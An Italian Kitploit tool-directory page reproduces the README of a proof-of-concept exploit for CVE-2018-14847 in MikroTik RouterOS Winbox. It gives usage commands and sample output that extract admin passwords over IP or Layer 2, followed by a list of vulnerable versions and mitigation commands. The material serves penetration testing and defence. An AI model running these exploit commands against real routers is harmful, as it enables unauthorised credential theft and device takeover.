Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-14847 — MikroTik RouterOS Winbox: vulnerabilità di lettura/scrittura arbitraria di file senza autenticazione | Kitploit
Strumenti/GitHubGitHub/jas502n/cve-2018-14847
RicognizioneAnalisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza di RetePenetration Testing
GitHubjas502n/cve-2018-14847

CVE-2018-14847

MikroTik RouterOS Winbox: vulnerabilità di lettura/scrittura arbitraria di file senza autenticazione

Vedi Repository
30107 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

WinboxExploit

Questa è una proof of concept della critica vulnerabilità WinBox (CVE-2018-14847) che consente la lettura arbitraria di file con password in chiaro.

Post del blog

https://n0p.me/winbox-bug-dissection/

Requisiti

  • Python 3+

Questo script NON funzionerà con Python 2.x o versioni precedenti.

Come Usare

L'uso dello script è semplice: basta passare semplici argomenti dalla riga di comando.

WinBox (TCP/IP)

Sfrutta la vulnerabilità e leggi la password.

root@kitploit:~
python3 WinboxExploit.py <IP-ADDRESS> [PORT]

Esempio:

root@kitploit:~
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord

MAC server WinBox (Layer 2)

Puoi estrarre file anche se il dispositivo non ha un indirizzo IP.

Semplice controllo di discovery per i dispositivi Mikrotik connessi localmente.

root@kitploit:~
python3 MACServerDiscover.py

Esempio:

root@kitploit:~
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

Sfrutta la vulnerabilità e leggi la password.

root@kitploit:~
python3 MACServerExploit.py <MAC-ADDRESS>

Esempio:

root@kitploit:~
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: Th3P4ssWord

Versioni vulnerabili

Tutte le versioni di RouterOS dal 2015-05-28 al 2018-04-20 sono vulnerabili a questo exploit.

Dispositivi Mikrotik con versioni RouterOS:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42
  • Beta: 6.29rc1 - 6.43rc3

Per maggiori informazioni consulta: https://blog.mikrotik.com/security/winbox-vulnerability.html

Tecniche di mitigazione

  • Aggiorna il router a una versione di RouterOS che includa la correzione.
  • Disabilita il servizio WinBox sul router.
  • Puoi limitare l'accesso al servizio WinBox a specifici indirizzi IP con il seguente comando:
root@kitploit:~
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • Puoi usare alcune Filter Rules (ACL) per negare l'accesso esterno al servizio WinBox:
root@kitploit:~
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • La limitazione dell'accesso al servizio mac-winbox può essere effettuata specificando le interfacce consentite:
root@kitploit:~
/tool mac-server mac-winbox

Copyright

  • Sponsorizzato dal CERTCC dell'Iran (https://certcc.ir). Tutti i diritti riservati.
Scarica lo strumento